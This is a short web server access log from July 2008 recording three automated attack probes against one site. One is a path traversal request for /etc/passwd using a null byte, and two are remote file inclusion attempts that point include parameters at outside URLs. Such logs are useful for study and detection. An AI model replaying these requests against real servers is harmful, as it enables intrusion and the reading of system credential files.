87.118.98.3 - - [23/Jul/2008:09:13:28 -0700] "GET /index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:13:29 -0700] "GET /logs/access_080207.log/becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.68.91.248 - - [23/Jul/2008:09:13:37 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
